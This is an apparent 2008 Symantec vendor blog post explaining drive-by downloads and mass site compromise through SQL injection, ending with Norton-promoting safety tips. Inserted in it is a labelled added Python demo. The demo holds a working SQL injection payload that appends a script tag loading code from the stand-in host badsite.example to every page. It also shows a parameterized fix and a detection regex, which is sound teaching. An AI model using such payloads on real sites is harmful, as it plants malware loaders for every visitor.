One MILLION websites compromised

In the old days, practicing “safe Internet” meant staying in the good online neighborhoods so you didn’t get infected. Today, almost any website you visit could be a landmine that leads to your system being compromised. We all remember the quote from Austin Powers where Dr. Evil says “One MILLION dollars”. Now imagine a techie version of Dr. Evil, let’s call him “Dr. Drive-by”, saying in that same tone “One MILLION websites compromised”. The size of a drive-by download outbreak can be gauged by searching Google for the attacker’s domain name and counting how many infected pages reference it. Recent reports from the SANS Internet Storm Center and The Register detail millions of potentially infected mainstream websites, including news media, retail shopping, hobby forums, gaming, banking, popular social networks, education, government, travel and vacation sites. In July 2008, Websense reported that “60 percent of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect”. The truth is that mainstream websites are being compromised and are subjecting consumers to drive-by downloads on a daily basis.

The what and the how of a drive-by download

So what is a drive-by download? Wikipedia defines it as a “Download of spyware, a computer virus or any kind of malware that happens without knowledge of the user.” No user interaction is required. You don’t have to click on anything, open a file, or send any information. Simply navigate to an infected site with a vulnerable browser or plug-in, and it’s “game over”: your system has been compromised! Bad guys can install anything on your system: fake antivirus products that trick you into paying to remove viruses you don’t have, keyloggers that steal your banking and credit card information, and bots that turn your system into a tool for compromising other sites.

Hackers are using automated tools to infect thousands of websites at a time, using techniques such as SQL injection to insert any code they want into those sites’ pages. It can be as simple as adding one line of code to a website that says “send any user who visits goodsite to my badsite hosting malicious attack software.” In practice that line is usually a hidden script or iframe tag pointing at the attacker’s server, which is why the same malicious domain turns up across thousands of unrelated sites. Your system is then attacked just by visiting goodsite. If your system is running a vulnerable browser, ActiveX control, or application such as a multimedia player, then badsite can add the malware to your system. The key takeaway is that the threat landscape has changed considerably in the past few years, and the security software on your system needs to change with it. Simply put, not all antivirus and security products are equal in the ways they protect you.
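The mechanism described above, a SQL injection flaw used to plant one line in every page of a site so that visitors’ browsers load content from the attacker’s host, as an added Python example that is not from the original post or from Symantec. The site name goodsite.example, the attacker host badsite.example, the articles table and the site’s “rename article” feature are all assumptions made up for the demonstration; it uses an in-memory SQLite database so it runs offline, shows the vulnerable query beside the parameterized fix, and ends with a small check a site owner can run over a served page to spot script or iframe loads from foreign hosts.

```python
# Added example (not from the original post): how a SQL injection hole in a
# site's content-management code lets an attacker append one line to every
# page, pointing visitors' browsers at a host the attacker controls, and how
# a parameterized query closes the hole. goodsite.example, badsite.example
# and the articles table are all made up for the demonstration.
import html
import re
import sqlite3

# Constructed sample content for the hypothetical "goodsite".
ARTICLES = [
    (1, "Welcome", "<p>Welcome to goodsite.example</p>"),
    (2, "News", "<p>Today's headlines</p>"),
]

# The one line the attacker wants in every page: a script reference to a
# malicious host (made-up name). Every visitor's browser fetches and runs it.
INJECTED_TAG = '<script src="http://badsite.example/x.js"></script>'

# A payload for the site's "rename article" feature. It closes the title
# string, adds a second SET clause that appends INJECTED_TAG to *every* body,
# replaces the WHERE clause, and comments out the rest of the original query.
PAYLOAD = "x', body = body || '" + INJECTED_TAG + "' WHERE 1=1 -- "


def make_db():
    """Fresh in-memory database seeded with the sample articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", ARTICLES)
    conn.commit()
    return conn


def vulnerable_update_title(conn, article_id, new_title):
    """Builds the SQL by string formatting, so user input is parsed as SQL.
    Deliberately unsafe: this is the flaw being demonstrated."""
    sql = "UPDATE articles SET title = '%s' WHERE id = %s" % (new_title, article_id)
    conn.execute(sql)
    conn.commit()


def safe_update_title(conn, article_id, new_title):
    """Same feature with bound parameters: the input is stored as data,
    quotes and all, and never reaches the SQL parser."""
    conn.execute("UPDATE articles SET title = ? WHERE id = ?", (new_title, article_id))
    conn.commit()


def render(conn, article_id):
    """What goodsite serves for an article. The title is plain text and is
    escaped; the body is stored HTML and is emitted as-is, which is exactly
    why an attacker-appended tag in the body reaches every visitor."""
    title, body = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return "<html><head><title>%s</title></head><body>%s</body></html>" % (
        html.escape(title), body)


# Script or iframe tags whose src points at another host.
_EXTERNAL_SRC = re.compile(
    r'<(?:script|iframe)\b[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)


def external_loads(page_html, own_host):
    """Hosts other than own_host that a page pulls script or iframe content
    from. A quick check a site owner (or a crawler) can run to spot an
    injected redirect; it is a heuristic, not a full HTML parser."""
    hosts = {m.group(1).lower() for m in _EXTERNAL_SRC.finditer(page_html)}
    return sorted(h for h in hosts if h != own_host.lower())


def demo():
    """Run the same payload against both versions of the feature and report
    which foreign hosts an untouched page ends up loading content from."""
    result = {}
    for name, update in (("vulnerable", vulnerable_update_title),
                         ("safe", safe_update_title)):
        conn = make_db()
        update(conn, 1, PAYLOAD)  # the attacker "renames" article 1 only
        # Article 2 was never named in the request; if it now loads from
        # badsite.example, the injection rewrote the whole table.
        result[name] = external_loads(render(conn, 2), "goodsite.example")
    return result


if __name__ == "__main__":
    print(demo())  # {'vulnerable': ['badsite.example'], 'safe': []}
```

The payload never needs a second SQL statement: a single UPDATE with an attacker-supplied SET clause and a `WHERE 1=1` is enough to rewrite every row, which is how one request turns into a site-wide redirect. The parameterized version stores the same string harmlessly as a title, and `external_loads` gives a site owner a cheap way to notice that pages have started pulling scripts from a host they do not own.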

New protection is required

Protection from today’s threats requires newer, proactive protection technologies that address what traditional signature-based approaches can’t. Symantec added new protection technologies to the Norton 2008 products, and to the soon-to-be-announced 2009 products, that provide additional protection against browser vulnerabilities, vulnerable ActiveX controls and multimedia application vulnerabilities.

Symantec commissioned Cascadia Labs to look at the effectiveness of leading paid consumer security products in protecting against today’s real-world attacks. Cascadia conducted an independent test using the same methods by which malicious websites attack users’ PCs, and also visited live malicious websites with the security products installed to protect them; some recent reports, such as Consumer Reports, missed this attack vector in their testing completely. The results show that Symantec’s Norton Internet Security 2008 provided almost perfect protection, the highest of any tested product. Cascadia’s full report can be found here: http://cascadialabs.com/clients.html

This will be a multi-part blog series looking at more of the techniques the bad guys are using to infect you (misleading applications such as fake codecs, fake antivirus applications, and malvertisements), what holes they’re using to get onto your system, and what you can do to be more safe and secure.

In the meantime, here are a few tips to protect yourself:
• Keep your operating system, applications, browser and associated plug-ins patched and up to date.
• It still pays to be discerning about which websites you visit, which links you click on and which applications you install, even if that is not a bulletproof defense.
• Run a top-rated security suite known for having leading technologies to keep you ahead of today’s threats. Norton Internet Security 2008 and 2009 have Browser Protection technology built in to protect against drive-by downloads and other Internet nasties, which is a great incentive for current Norton users to update to the latest version at no additional cost as part of their subscription!
• Keep a valid subscription so that security updates keep coming.

John Harrison, aka “Dr. Drive-By”

  Message Edited by jgonzales on 08-28-2008 11:59 AM